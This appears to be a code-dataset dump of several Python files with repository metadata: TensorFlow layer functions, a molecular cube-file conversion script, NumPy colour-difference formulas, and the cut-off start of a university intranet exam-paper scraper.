return [op.inputs[0].shape]
def _scale_gradient_grad(op, grad):
return [grad * op.inputs[1], None]
@function.Defun(python_grad_func=_scale_gradient_grad,
shape_func=_scale_gradient_shape)
def scale_gradient(inputs, gradient_multiplier):
# gradient_multiplier is implicitly saved by decorator, and only used for
# gradient computation.
del gradient_multiplier
return inputs
@add_arg_scope
def separable_convolution2d(
inputs,
num_outputs,
kernel_size,
depth_multiplier,
stride=1,
padding='SAME',
data_format=DATA_FORMAT_NHWC,
rate=1,
activation_fn=nn.relu,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=initializers.xavier_initializer(),
weights_regularizer=None,
biases_initializer=init_ops.zeros_initializer(),
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
raise ValueError('data_format has to be either NCHW or NHWC.')
layer_variable_getter = _build_variable_getter(
{'bias': 'biases',
'depthwise_kernel': 'depthwise_weights',
'pointwise_kernel': 'pointwise_weights'})
with variable_scope.variable_scope(
scope, 'SeparableConv2d', [inputs], reuse=reuse,
custom_getter=layer_variable_getter) as sc:
inputs = ops.convert_to_tensor(inputs)
df = ('channels_first' if data_format and data_format.startswith('NC')
else 'channels_last')
if num_outputs is not None:
# Apply separable conv using the SeparableConvolution2D layer.
layer = convolutional_layers.SeparableConvolution2D(
filters=num_outputs,
kernel_size=kernel_size,
strides=stride,
padding=padding,
data_format=df,
dilation_rate=utils.two_element_tuple(rate),
activation=None,
depth_multiplier=depth_multiplier,
use_bias=not normalizer_fn and biases_initializer,
depthwise_initializer=weights_initializer,
pointwise_initializer=weights_initializer,
bias_initializer=biases_initializer,
depthwise_regularizer=weights_regularizer,
pointwise_regularizer=weights_regularizer,
bias_regularizer=biases_regularizer,
activity_regularizer=None,
trainable=trainable,
name=sc.name,
dtype=inputs.dtype.base_dtype,
_scope=sc,
_reuse=reuse)
outputs = layer.apply(inputs)
# Add variables to collections.
_add_variable_to_collections(layer.depthwise_kernel,
variables_collections, 'weights')
_add_variable_to_collections(layer.pointwise_kernel,
variables_collections, 'weights')
if layer.bias:
_add_variable_to_collections(layer.bias,
variables_collections, 'biases')
if normalizer_fn is not None:
normalizer_params = normalizer_params or {}
outputs = normalizer_fn(outputs, **normalizer_params)
else:
# Actually apply depthwise conv instead of separable conv.
dtype = inputs.dtype.base_dtype
kernel_h, kernel_w = utils.two_element_tuple(kernel_size)
stride_h, stride_w = utils.two_element_tuple(stride)
num_filters_in = utils.channel_dimension(
inputs.get_shape(), df, min_rank=4)
weights_collections = utils.get_variable_collections(
variables_collections, 'weights')
depthwise_shape = [kernel_h, kernel_w,
num_filters_in, depth_multiplier]
depthwise_weights = variables.model_variable(
'depthwise_weights',
shape=depthwise_shape,
dtype=dtype,
initializer=weights_initializer,
regularizer=weights_regularizer,
trainable=trainable,
collections=weights_collections)
strides = [1, stride_h, stride_w, 1]
outputs = nn.depthwise_conv2d(inputs, depthwise_weights, strides, padding,
rate=utils.two_element_tuple(rate),
data_format=data_format)
num_outputs = depth_multiplier * num_filters_in
if normalizer_fn is not None:
normalizer_params = normalizer_params or {}
outputs = normalizer_fn(outputs, **normalizer_params)
else:
if biases_initializer is not None:
biases_collections = utils.get_variable_collections(
variables_collections, 'biases')
biases = variables.model_variable('biases',
shape=[num_outputs,],
dtype=dtype,
initializer=biases_initializer,
regularizer=biases_regularizer,
trainable=trainable,
collections=biases_collections)
outputs = nn.bias_add(outputs, biases, data_format=data_format)
if activation_fn is not None:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections,
sc.original_name_scope, outputs)
@add_arg_scope
def softmax(logits, scope=None):
# TODO(jrru): Add axis argument which defaults to last dimension.
with variable_scope.variable_scope(scope, 'softmax', [logits]):
num_logits = utils.last_dimension(logits.get_shape(), min_rank=2)
logits_2d = array_ops.reshape(logits, [-1, num_logits])
predictions = nn.softmax(logits_2d)
predictions = array_ops.reshape(predictions, array_ops.shape(logits))
predictions.set_shape(logits.get_shape())
return predictions
@add_arg_scope
def spatial_softmax(features,
temperature=None,
name=None,
variables_collections=None,
trainable=True,
data_format='NHWC'):
shape = array_ops.shape(features)
static_shape = features.shape
if data_format == DATA_FORMAT_NHWC:
height, width, num_channels = shape[1], shape[2], static_shape[3]
elif data_format == DATA_FORMAT_NCHW:
num_channels, height, width = static_shape[1], shape[2], shape[3]
else:
raise ValueError('data_format has to be either NCHW or NHWC.')
if num_channels.value is None:
raise ValueError('The num_channels dimension of the inputs to '
'`spatial_softmax` should be defined. Found `None`.')
with ops.name_scope(name, 'spatial_softmax', [features]) as name:
# Create tensors for x and y coordinate values, scaled to range [-1, 1].
pos_x, pos_y = array_ops.meshgrid(math_ops.lin_space(-1., 1., num=height),
math_ops.lin_space(-1., 1., num=width),
indexing='ij')
pos_x = array_ops.reshape(pos_x, [height * width])
pos_y = array_ops.reshape(pos_y, [height * width])
if temperature is None:
temperature_collections = utils.get_variable_collections(
variables_collections, 'temperature')
temperature = variables.model_variable(
'temperature',
shape=(),
dtype=dtypes.float32,
initializer=init_ops.ones_initializer(),
collections=temperature_collections,
trainable=trainable)
if data_format == 'NCHW':
features = array_ops.reshape(features, [-1, height * width])
else:
features = array_ops.reshape(
array_ops.transpose(features, [0, 3, 1, 2]), [-1, height * width])
softmax_attention = nn.softmax(features/temperature)
expected_x = math_ops.reduce_sum(
pos_x * softmax_attention, [1], keep_dims=True)
expected_y = math_ops.reduce_sum(
pos_y * softmax_attention, [1], keep_dims=True)
expected_xy = array_ops.concat([expected_x, expected_y], 1)
feature_keypoints = array_ops.reshape(
expected_xy, [-1, num_channels.value * 2])
feature_keypoints.set_shape([None, num_channels.value * 2])
return feature_keypoints
def stack(inputs, layer, stack_args, **kwargs):
scope = kwargs.pop('scope', None)
if not isinstance(stack_args, (list, tuple)):
raise ValueError('stack_args need to be a list or tuple')
with variable_scope.variable_scope(scope, 'Stack', [inputs]):
inputs = ops.convert_to_tensor(inputs)
if scope is None:
if hasattr(layer, '__name__'):
scope = layer.__name__
elif hasattr(layer, 'func') and hasattr(layer.func, '__name__'):
scope = layer.func.__name__ # In case layer is a functools.partial.
else:
scope = 'stack'
outputs = inputs
for i in range(len(stack_args)):
kwargs['scope'] = scope + '_' + str(i+1)
layer_args = stack_args[i]
if not isinstance(layer_args, (list, tuple)):
layer_args = [layer_args]
outputs = layer(outputs, *layer_args, **kwargs)
return outputs
@add_arg_scope
def unit_norm(inputs, dim, epsilon=1e-7, scope=None):
with variable_scope.variable_scope(scope, 'UnitNorm', [inputs]):
if not inputs.get_shape():
raise ValueError('The input rank must be known.')
input_rank = len(inputs.get_shape().as_list())
if dim < 0 or dim >= input_rank:
raise ValueError(
'dim must be positive but smaller than the input rank.')
lengths = math_ops.sqrt(epsilon + math_ops.reduce_sum(
math_ops.square(inputs), dim, True))
multiples = []
if dim > 0:
multiples.append(array_ops.ones([dim], dtypes.int32))
multiples.append(
array_ops.strided_slice(array_ops.shape(inputs), [dim], [dim + 1]))
if dim < (input_rank - 1):
multiples.append(array_ops.ones([input_rank - 1 - dim], dtypes.int32))
multiples = array_ops.concat(multiples, 0)
return math_ops.div(inputs, array_ops.tile(lengths, multiples))
def poincare_normalize(x, axis=1, epsilon=1e-5, name=None):
with ops.name_scope(name, 'poincare_normalize', [x]) as name:
x = ops.convert_to_tensor(x, name='x')
square_sum = math_ops.reduce_sum(math_ops.square(x), axis, keep_dims=True)
x_inv_norm = math_ops.rsqrt(square_sum)
x_inv_norm = math_ops.minimum((1. - epsilon) * x_inv_norm, 1.)
return math_ops.multiply(x, x_inv_norm, name=name)
def legacy_fully_connected(x,
num_output_units,
activation_fn=None,
weight_init=initializers.xavier_initializer(),
bias_init=init_ops.zeros_initializer(),
name=None,
weight_collections=(ops.GraphKeys.WEIGHTS,),
bias_collections=(ops.GraphKeys.BIASES,),
output_collections=(ops.GraphKeys.ACTIVATIONS,),
trainable=True,
weight_regularizer=None,
bias_regularizer=None):
# pylint: disable=anomalous-backslash-in-string
with variable_scope.variable_scope(name, 'fully_connected', [x]):
x = ops.convert_to_tensor(x)
dims = x.get_shape().dims
if dims is None:
raise ValueError('dims of x must be known but is None')
if len(dims) < 2:
raise ValueError('rank of x must be at least 2 not: %d' % len(dims))
num_input_units = dims[-1].value
if num_input_units is None:
raise ValueError('last dimension of x must be known but is None')
dtype = x.dtype.base_dtype
weight_collections = set(list(weight_collections or []) +
[ops.GraphKeys.GLOBAL_VARIABLES])
w = variable_scope.get_variable('weights',
shape=[num_input_units, num_output_units],
dtype=dtype,
initializer=weight_init,
collections=weight_collections,
regularizer=weight_regularizer,
trainable=trainable)
x_2_dim = x if len(dims) <= 2 else array_ops.reshape(x,
[-1, num_input_units])
y = standard_ops.matmul(x_2_dim, w)
if bias_init is not None:
bias_collections = set(list(bias_collections or []) +
[ops.GraphKeys.GLOBAL_VARIABLES])
b = variable_scope.get_variable('bias',
shape=[num_output_units],
dtype=dtype,
initializer=bias_init,
collections=bias_collections,
regularizer=bias_regularizer,
trainable=trainable)
y = nn.bias_add(y, b)
if len(dims) > 2:
out_shape = array_ops.unstack(array_ops.shape(x))
out_shape[-1] = num_output_units
y = array_ops.reshape(y, array_ops.stack(out_shape))
static_shape = x.get_shape().as_list()
static_shape[-1] = num_output_units
y.set_shape(static_shape)
return _apply_activation(y, activation_fn, output_collections)
# TODO(eiderm): Verify and fix autocomplete in colab (also relu6).
# Simple aliases which remove the activation_fn parameter.
elu = functools.partial(fully_connected, activation_fn=nn.elu)
legacy_relu = functools.partial(legacy_fully_connected, activation_fn=nn.relu)
legacy_linear = functools.partial(legacy_fully_connected, activation_fn=None)
relu = functools.partial(fully_connected, activation_fn=nn.relu)
relu6 = functools.partial(fully_connected, activation_fn=nn.relu6)
linear = functools.partial(fully_connected, activation_fn=None)
# Simple alias.
conv2d = convolution2d
conv3d = convolution3d
conv2d_transpose = convolution2d_transpose
conv3d_transpose = convolution3d_transpose
conv2d_in_plane = convolution2d_in_plane
separable_conv2d = separable_convolution2d
| true
| true
|
f704f90ac3c9d0634fcdcbb3eca1f502fa10cc71
| 3,596
|
py
|
Python
|
aa2ua_cube.py
|
jotelha/smampppp
|
729e4733b436e68adfe07bcaa39a47727d0c8dd8
|
[
"MIT"
] | 1
|
2022-03-15T17:23:52.000Z
|
2022-03-15T17:23:52.000Z
|
aa2ua_cube.py
|
jotelha/smampppp
|
729e4733b436e68adfe07bcaa39a47727d0c8dd8
|
[
"MIT"
] | null | null | null |
aa2ua_cube.py
|
jotelha/smampppp
|
729e4733b436e68adfe07bcaa39a47727d0c8dd8
|
[
"MIT"
] | 1
|
2018-04-06T11:29:44.000Z
|
2018-04-06T11:29:44.000Z
|
#!/usr/bin/env python
""" Maps point charges obtained by GPAW and HORTON on the original'
' GROMACS topology initially modified by insertHbyList.py """
## jlh 2018/04/02
import ast
import h5py
import ase.io
from ase.io.cube import read_cube_data
import parmed as pmd
from parmed import gromacs
from insertHbyList import insertHbyList
import argparse
def main():
parser = argparse.ArgumentParser(\
description='Converts an all-atom cube file into united-atom'
' representation based on certain replacement rules')
#parser.add_argument('-c', '--charge',metavar='INTEGER_CHARGE',
# type=int,nargs='?', const=1, default=0)
#parser.add_argument('infile', nargs='?')
parser.add_argument('infile_pdb', nargs='?', metavar='infile.pdb',
default='system.pdb',
help="Original .pdb file, before insertion of implicit hydrogen.")
parser.add_argument('infile_top', nargs='?', metavar='infile.top',
default='system.top', help="Original GROMACS .top file")
parser.add_argument('infile_cube', nargs='?', metavar='infile.cube',
default='esp.cube',
help="ESP descrition (or other scalar field) in all-atom cube file.")
parser.add_argument('outfile_cube', nargs='?', metavar='outfile.cube',
default='esp_fitted_system.top', help="Output truncated by atoms only"
"present in all-atoms description")
parser.add_argument('-i','--insertion-rules',
default="{'CD4':1,'CD3':1,'CA2':2,'CA3':2,'CA4':2,'CB2':2,'CB3':2}",
help="A string representation of a python dictionary, describing how "
"many implicit hydrogens have been inserted at which atom. Example: "
"{'CD4':1,'CD3':1,'CA2':2,'CA3':2,'CA4':2,'CB2':2,'CB3':2}")
args = parser.parse_args()
#implicitHbondingPartners={'CD4':1,'CD3':1,'CA2':2,'CA3':2,'CA4':2,'CB2':2,'CB3':2}
print('Using replacement rules "{}"...'.format(args.insertion_rules))
implicitHbondingPartners = ast.literal_eval(args.insertion_rules)
aa2ua_cube(args.infile_pdb, args.infile_top, args.infile_cube,
args.outfile_cube,implicitHbondingPartners=implicitHbondingPartners)
def aa2ua_cube(infile_pdb, infile_top, infile_cube,
outfile_cube,implicitHbondingPartners=
{'CD4':1,'CD3':1,'CA2':2,'CA3':2,'CA4':2,'CB2':2,'CB3':2}):
#infile_pdb = args.infile_pdb
#infile_top = args.infile_top
#infile_cube = args.infile_cube
#outfile_cube = args.outfile_cube
ase_struct=ase.io.read(infile_pdb)
pmd_struct = pmd.load_file(infile_pdb)
pmd_top = gromacs.GromacsTopologyFile(infile_top,parametrize=False)
# throws some warnings on angle types, does not matter for bonding info
pmd_top.strip(':SOL,CL') # strip water and electrolyte from system
pmd_top.box = pmd_struct.box # Needed because .prmtop contains box info
pmd_top.positions = pmd_struct.positions
new_ase_struct, new_pmd_struct, names, residues = insertHbyList(
ase_struct,pmd_top,implicitHbondingPartners,1.0)
surplus_atoms = len(new_ase_struct) - len(ase_struct)
print("{} atoms are going to be truncated from file"
"{}...".format(surplus_atoms,infile_cube))
# hdf5 = h5py.File(infile_h5,'r')
cube_data, cube_atoms = read_cube_data(infile_cube)
ase.io.write(outfile_cube, cube_atoms[0:len(ase_struct)], data=cube_data)
# ATTENTION: this script just truncates atoms based on total count difference
# in UA and AA representations
if __name__ == '__main__':
main()
| 44.95
| 87
| 0.682147
|
ort h5py
import ase.io
from ase.io.cube import read_cube_data
import parmed as pmd
from parmed import gromacs
from insertHbyList import insertHbyList
import argparse
def main():
parser = argparse.ArgumentParser(\
description='Converts an all-atom cube file into united-atom'
' representation based on certain replacement rules')
parser.add_argument('infile_pdb', nargs='?', metavar='infile.pdb',
default='system.pdb',
help="Original .pdb file, before insertion of implicit hydrogen.")
parser.add_argument('infile_top', nargs='?', metavar='infile.top',
default='system.top', help="Original GROMACS .top file")
parser.add_argument('infile_cube', nargs='?', metavar='infile.cube',
default='esp.cube',
help="ESP descrition (or other scalar field) in all-atom cube file.")
parser.add_argument('outfile_cube', nargs='?', metavar='outfile.cube',
default='esp_fitted_system.top', help="Output truncated by atoms only"
"present in all-atoms description")
parser.add_argument('-i','--insertion-rules',
default="{'CD4':1,'CD3':1,'CA2':2,'CA3':2,'CA4':2,'CB2':2,'CB3':2}",
help="A string representation of a python dictionary, describing how "
"many implicit hydrogens have been inserted at which atom. Example: "
"{'CD4':1,'CD3':1,'CA2':2,'CA3':2,'CA4':2,'CB2':2,'CB3':2}")
args = parser.parse_args()
print('Using replacement rules "{}"...'.format(args.insertion_rules))
implicitHbondingPartners = ast.literal_eval(args.insertion_rules)
aa2ua_cube(args.infile_pdb, args.infile_top, args.infile_cube,
args.outfile_cube,implicitHbondingPartners=implicitHbondingPartners)
def aa2ua_cube(infile_pdb, infile_top, infile_cube,
outfile_cube,implicitHbondingPartners=
{'CD4':1,'CD3':1,'CA2':2,'CA3':2,'CA4':2,'CB2':2,'CB3':2}):
ase_struct=ase.io.read(infile_pdb)
pmd_struct = pmd.load_file(infile_pdb)
pmd_top = gromacs.GromacsTopologyFile(infile_top,parametrize=False)
pmd_top.strip(':SOL,CL')
pmd_top.box = pmd_struct.box
pmd_top.positions = pmd_struct.positions
new_ase_struct, new_pmd_struct, names, residues = insertHbyList(
ase_struct,pmd_top,implicitHbondingPartners,1.0)
surplus_atoms = len(new_ase_struct) - len(ase_struct)
print("{} atoms are going to be truncated from file"
"{}...".format(surplus_atoms,infile_cube))
cube_data, cube_atoms = read_cube_data(infile_cube)
ase.io.write(outfile_cube, cube_atoms[0:len(ase_struct)], data=cube_data)
if __name__ == '__main__':
main()
| true
| true
|
f704fa8cf0c91be4a9dab86662c520f3207e5d08
| 5,352
|
py
|
Python
|
venv/lib/python3.7/site-packages/colormath/color_diff_matrix.py
|
rchen2123/ryu
|
99400f8c421c1a84b4c7e80dd26224b36ee6d779
|
[
"Apache-2.0"
] | null | null | null |
venv/lib/python3.7/site-packages/colormath/color_diff_matrix.py
|
rchen2123/ryu
|
99400f8c421c1a84b4c7e80dd26224b36ee6d779
|
[
"Apache-2.0"
] | null | null | null |
venv/lib/python3.7/site-packages/colormath/color_diff_matrix.py
|
rchen2123/ryu
|
99400f8c421c1a84b4c7e80dd26224b36ee6d779
|
[
"Apache-2.0"
] | null | null | null |
"""
This module contains the formulas for comparing Lab values with matrices
and vectors. The benefit of using NumPy's matrix capabilities is speed. These
calls can be used to efficiently compare large volumes of Lab colors.
"""
import numpy
def delta_e_cie1976(lab_color_vector, lab_color_matrix):
"""
Calculates the Delta E (CIE1976) between `lab_color_vector` and all
colors in `lab_color_matrix`.
"""
return numpy.sqrt(
numpy.sum(numpy.power(lab_color_vector - lab_color_matrix, 2), axis=1))
# noinspection PyPep8Naming
def delta_e_cie1994(lab_color_vector, lab_color_matrix,
K_L=1, K_C=1, K_H=1, K_1=0.045, K_2=0.015):
"""
Calculates the Delta E (CIE1994) of two colors.
K_l:
0.045 graphic arts
0.048 textiles
K_2:
0.015 graphic arts
0.014 textiles
K_L:
1 default
2 textiles
"""
C_1 = numpy.sqrt(numpy.sum(numpy.power(lab_color_vector[1:], 2)))
C_2 = numpy.sqrt(numpy.sum(numpy.power(lab_color_matrix[:, 1:], 2), axis=1))
delta_lab = lab_color_vector - lab_color_matrix
delta_L = delta_lab[:, 0].copy()
delta_C = C_1 - C_2
delta_lab[:, 0] = delta_C
delta_H_sq = numpy.sum(numpy.power(delta_lab, 2) * numpy.array([-1, 1, 1]), axis=1)
# noinspection PyArgumentList
delta_H = numpy.sqrt(delta_H_sq.clip(min=0))
S_L = 1
S_C = 1 + K_1 * C_1
S_H = 1 + K_2 * C_1
LCH = numpy.vstack([delta_L, delta_C, delta_H])
params = numpy.array([[K_L * S_L], [K_C * S_C], [K_H * S_H]])
return numpy.sqrt(numpy.sum(numpy.power(LCH / params, 2), axis=0))
# noinspection PyPep8Naming
def delta_e_cmc(lab_color_vector, lab_color_matrix, pl=2, pc=1):
"""
Calculates the Delta E (CIE1994) of two colors.
CMC values
Acceptability: pl=2, pc=1
Perceptability: pl=1, pc=1
"""
L, a, b = lab_color_vector
C_1 = numpy.sqrt(numpy.sum(numpy.power(lab_color_vector[1:], 2)))
C_2 = numpy.sqrt(numpy.sum(numpy.power(lab_color_matrix[:, 1:], 2), axis=1))
delta_lab = lab_color_vector - lab_color_matrix
delta_L = delta_lab[:, 0].copy()
delta_C = C_1 - C_2
delta_lab[:, 0] = delta_C
H_1 = numpy.degrees(numpy.arctan2(b, a))
if H_1 < 0:
H_1 += 360
F = numpy.sqrt(numpy.power(C_1, 4) / (numpy.power(C_1, 4) + 1900.0))
# noinspection PyChainedComparisons
if 164 <= H_1 and H_1 <= 345:
T = 0.56 + abs(0.2 * numpy.cos(numpy.radians(H_1 + 168)))
else:
T = 0.36 + abs(0.4 * numpy.cos(numpy.radians(H_1 + 35)))
if L < 16:
S_L = 0.511
else:
S_L = (0.040975 * L) / (1 + 0.01765 * L)
S_C = ((0.0638 * C_1) / (1 + 0.0131 * C_1)) + 0.638
S_H = S_C * (F * T + 1 - F)
delta_C = C_1 - C_2
delta_H_sq = numpy.sum(numpy.power(delta_lab, 2) * numpy.array([-1, 1, 1]), axis=1)
# noinspection PyArgumentList
delta_H = numpy.sqrt(delta_H_sq.clip(min=0))
LCH = numpy.vstack([delta_L, delta_C, delta_H])
params = numpy.array([[pl * S_L], [pc * S_C], [S_H]])
return numpy.sqrt(numpy.sum(numpy.power(LCH / params, 2), axis=0))
# noinspection PyPep8Naming
def delta_e_cie2000(lab_color_vector, lab_color_matrix, Kl=1, Kc=1, Kh=1):
"""
Calculates the Delta E (CIE2000) of two colors.
"""
L, a, b = lab_color_vector
avg_Lp = (L + lab_color_matrix[:, 0]) / 2.0
C1 = numpy.sqrt(numpy.sum(numpy.power(lab_color_vector[1:], 2)))
C2 = numpy.sqrt(numpy.sum(numpy.power(lab_color_matrix[:, 1:], 2), axis=1))
avg_C1_C2 = (C1 + C2) / 2.0
G = 0.5 * (1 - numpy.sqrt(numpy.power(avg_C1_C2, 7.0) / (numpy.power(avg_C1_C2, 7.0) + numpy.power(25.0, 7.0))))
a1p = (1.0 + G) * a
a2p = (1.0 + G) * lab_color_matrix[:, 1]
C1p = numpy.sqrt(numpy.power(a1p, 2) + numpy.power(b, 2))
C2p = numpy.sqrt(numpy.power(a2p, 2) + numpy.power(lab_color_matrix[:, 2], 2))
avg_C1p_C2p = (C1p + C2p) / 2.0
h1p = numpy.degrees(numpy.arctan2(b, a1p))
h1p += (h1p < 0) * 360
h2p = numpy.degrees(numpy.arctan2(lab_color_matrix[:, 2], a2p))
h2p += (h2p < 0) * 360
avg_Hp = (((numpy.fabs(h1p - h2p) > 180) * 360) + h1p + h2p) / 2.0
T = 1 - 0.17 * numpy.cos(numpy.radians(avg_Hp - 30)) + \
0.24 * numpy.cos(numpy.radians(2 * avg_Hp)) + \
0.32 * numpy.cos(numpy.radians(3 * avg_Hp + 6)) - \
0.2 * numpy.cos(numpy.radians(4 * avg_Hp - 63))
diff_h2p_h1p = h2p - h1p
delta_hp = diff_h2p_h1p + (numpy.fabs(diff_h2p_h1p) > 180) * 360
delta_hp -= (h2p > h1p) * 720
delta_Lp = lab_color_matrix[:, 0] - L
delta_Cp = C2p - C1p
delta_Hp = 2 * numpy.sqrt(C2p * C1p) * numpy.sin(numpy.radians(delta_hp) / 2.0)
S_L = 1 + ((0.015 * numpy.power(avg_Lp - 50, 2)) / numpy.sqrt(20 + numpy.power(avg_Lp - 50, 2.0)))
S_C = 1 + 0.045 * avg_C1p_C2p
S_H = 1 + 0.015 * avg_C1p_C2p * T
delta_ro = 30 * numpy.exp(-(numpy.power(((avg_Hp - 275) / 25), 2.0)))
R_C = numpy.sqrt((numpy.power(avg_C1p_C2p, 7.0)) / (numpy.power(avg_C1p_C2p, 7.0) + numpy.power(25.0, 7.0)))
R_T = -2 * R_C * numpy.sin(2 * numpy.radians(delta_ro))
return numpy.sqrt(
numpy.power(delta_Lp / (S_L * Kl), 2) +
numpy.power(delta_Cp / (S_C * Kc), 2) +
numpy.power(delta_Hp / (S_H * Kh), 2) +
R_T * (delta_Cp / (S_C * Kc)) * (delta_Hp / (S_H * Kh)))
| 31.668639
| 116
| 0.604634
|
import numpy
def delta_e_cie1976(lab_color_vector, lab_color_matrix):
return numpy.sqrt(
numpy.sum(numpy.power(lab_color_vector - lab_color_matrix, 2), axis=1))
def delta_e_cie1994(lab_color_vector, lab_color_matrix,
K_L=1, K_C=1, K_H=1, K_1=0.045, K_2=0.015):
C_1 = numpy.sqrt(numpy.sum(numpy.power(lab_color_vector[1:], 2)))
C_2 = numpy.sqrt(numpy.sum(numpy.power(lab_color_matrix[:, 1:], 2), axis=1))
delta_lab = lab_color_vector - lab_color_matrix
delta_L = delta_lab[:, 0].copy()
delta_C = C_1 - C_2
delta_lab[:, 0] = delta_C
delta_H_sq = numpy.sum(numpy.power(delta_lab, 2) * numpy.array([-1, 1, 1]), axis=1)
delta_H = numpy.sqrt(delta_H_sq.clip(min=0))
S_L = 1
S_C = 1 + K_1 * C_1
S_H = 1 + K_2 * C_1
LCH = numpy.vstack([delta_L, delta_C, delta_H])
params = numpy.array([[K_L * S_L], [K_C * S_C], [K_H * S_H]])
return numpy.sqrt(numpy.sum(numpy.power(LCH / params, 2), axis=0))
def delta_e_cmc(lab_color_vector, lab_color_matrix, pl=2, pc=1):
L, a, b = lab_color_vector
C_1 = numpy.sqrt(numpy.sum(numpy.power(lab_color_vector[1:], 2)))
C_2 = numpy.sqrt(numpy.sum(numpy.power(lab_color_matrix[:, 1:], 2), axis=1))
delta_lab = lab_color_vector - lab_color_matrix
delta_L = delta_lab[:, 0].copy()
delta_C = C_1 - C_2
delta_lab[:, 0] = delta_C
H_1 = numpy.degrees(numpy.arctan2(b, a))
if H_1 < 0:
H_1 += 360
F = numpy.sqrt(numpy.power(C_1, 4) / (numpy.power(C_1, 4) + 1900.0))
if 164 <= H_1 and H_1 <= 345:
T = 0.56 + abs(0.2 * numpy.cos(numpy.radians(H_1 + 168)))
else:
T = 0.36 + abs(0.4 * numpy.cos(numpy.radians(H_1 + 35)))
if L < 16:
S_L = 0.511
else:
S_L = (0.040975 * L) / (1 + 0.01765 * L)
S_C = ((0.0638 * C_1) / (1 + 0.0131 * C_1)) + 0.638
S_H = S_C * (F * T + 1 - F)
delta_C = C_1 - C_2
delta_H_sq = numpy.sum(numpy.power(delta_lab, 2) * numpy.array([-1, 1, 1]), axis=1)
delta_H = numpy.sqrt(delta_H_sq.clip(min=0))
LCH = numpy.vstack([delta_L, delta_C, delta_H])
params = numpy.array([[pl * S_L], [pc * S_C], [S_H]])
return numpy.sqrt(numpy.sum(numpy.power(LCH / params, 2), axis=0))
def delta_e_cie2000(lab_color_vector, lab_color_matrix, Kl=1, Kc=1, Kh=1):
L, a, b = lab_color_vector
avg_Lp = (L + lab_color_matrix[:, 0]) / 2.0
C1 = numpy.sqrt(numpy.sum(numpy.power(lab_color_vector[1:], 2)))
C2 = numpy.sqrt(numpy.sum(numpy.power(lab_color_matrix[:, 1:], 2), axis=1))
avg_C1_C2 = (C1 + C2) / 2.0
G = 0.5 * (1 - numpy.sqrt(numpy.power(avg_C1_C2, 7.0) / (numpy.power(avg_C1_C2, 7.0) + numpy.power(25.0, 7.0))))
a1p = (1.0 + G) * a
a2p = (1.0 + G) * lab_color_matrix[:, 1]
C1p = numpy.sqrt(numpy.power(a1p, 2) + numpy.power(b, 2))
C2p = numpy.sqrt(numpy.power(a2p, 2) + numpy.power(lab_color_matrix[:, 2], 2))
avg_C1p_C2p = (C1p + C2p) / 2.0
h1p = numpy.degrees(numpy.arctan2(b, a1p))
h1p += (h1p < 0) * 360
h2p = numpy.degrees(numpy.arctan2(lab_color_matrix[:, 2], a2p))
h2p += (h2p < 0) * 360
avg_Hp = (((numpy.fabs(h1p - h2p) > 180) * 360) + h1p + h2p) / 2.0
T = 1 - 0.17 * numpy.cos(numpy.radians(avg_Hp - 30)) + \
0.24 * numpy.cos(numpy.radians(2 * avg_Hp)) + \
0.32 * numpy.cos(numpy.radians(3 * avg_Hp + 6)) - \
0.2 * numpy.cos(numpy.radians(4 * avg_Hp - 63))
diff_h2p_h1p = h2p - h1p
delta_hp = diff_h2p_h1p + (numpy.fabs(diff_h2p_h1p) > 180) * 360
delta_hp -= (h2p > h1p) * 720
delta_Lp = lab_color_matrix[:, 0] - L
delta_Cp = C2p - C1p
delta_Hp = 2 * numpy.sqrt(C2p * C1p) * numpy.sin(numpy.radians(delta_hp) / 2.0)
S_L = 1 + ((0.015 * numpy.power(avg_Lp - 50, 2)) / numpy.sqrt(20 + numpy.power(avg_Lp - 50, 2.0)))
S_C = 1 + 0.045 * avg_C1p_C2p
S_H = 1 + 0.015 * avg_C1p_C2p * T
delta_ro = 30 * numpy.exp(-(numpy.power(((avg_Hp - 275) / 25), 2.0)))
R_C = numpy.sqrt((numpy.power(avg_C1p_C2p, 7.0)) / (numpy.power(avg_C1p_C2p, 7.0) + numpy.power(25.0, 7.0)))
R_T = -2 * R_C * numpy.sin(2 * numpy.radians(delta_ro))
return numpy.sqrt(
numpy.power(delta_Lp / (S_L * Kl), 2) +
numpy.power(delta_Cp / (S_C * Kc), 2) +
numpy.power(delta_Hp / (S_H * Kh), 2) +
R_T * (delta_Cp / (S_C * Kc)) * (delta_Hp / (S_H * Kh)))
| true
| true
|
f704fab0af522b8019096eec4487783464bda665
| 3,827
|
py
|
Python
|
IntranetExam.py
|
capturemathan/Amrita_Intranet_ExamPapers
|
8d11b5c9ce8d1641e05d219acfa91b2f5b2b6584
|
[
"MIT"
] | null | null | null |
IntranetExam.py
|
capturemathan/Amrita_Intranet_ExamPapers
|
8d11b5c9ce8d1641e05d219acfa91b2f5b2b6584
|
[
"MIT"
] | null | null | null |
IntranetExam.py
|
capturemathan/Amrita_Intranet_ExamPapers
|
8d11b5c9ce8d1641e05d219acfa91b2f5b2b6584
|
[
"MIT"
] | null | null | null |
import os
import webbrowser
import time
import random
import requests
from bs4 import BeautifulSoup
from prettytable import PrettyTable
from time import sleep
cont = 1
print("Welcome to Qp Bank !")
sleep(1)
print("Crafted with love by Mathan.S")
sleep(1)
print("Ensure your connectivity to Amrita Wifi for smooth experience :)")
# Captcha Disabled
"""a=["M234x","Ad34T","Fr45C","J234r","PKa67"]
z=random.randint(0,4)
print(a[z])
captcha=input("Enter the captcha")
while(captcha!=a[z]):
print("Enter the correct captcha..")
a=["M234x","Ad34T","Fr45C","J234r","PKa67"]
z=random.randint(0,4)
print(a[z])
captcha=input("Enter the captcha")"""
while(cont==1):
url="http://dspace.amritanet.edu:8080/xmlui/handle/123456789/150"
page=requests.get(url)
soup=BeautifulSoup(page.content,'html.parser')
div=soup.div
main_div=soup.find(id="aspect_artifactbrowser_CommunityViewer_div_community-view")
t=PrettyTable(["S.No","Attribute"])
main_list_item=main_div.ul
items=main_list_item.findAll("li")
for i in range(len(items)):
t.add_row([i+1,items[i].a.text.strip()])
print(t)
ch=int(input("Enter your Semester "))
while((ch>len(items)) or (ch<0)):
ch=int(input("Enter your Semester "))
url="http://dspace.amritanet.edu:8080"
url+=items[ch-1].a["href"]
print("Give me just a minute...")
sec_page=requests.get(url)
sec_soup=BeautifulSoup(sec_page.content,'html.parser')
u=sec_soup.findAll("ul")
if ch<=6:
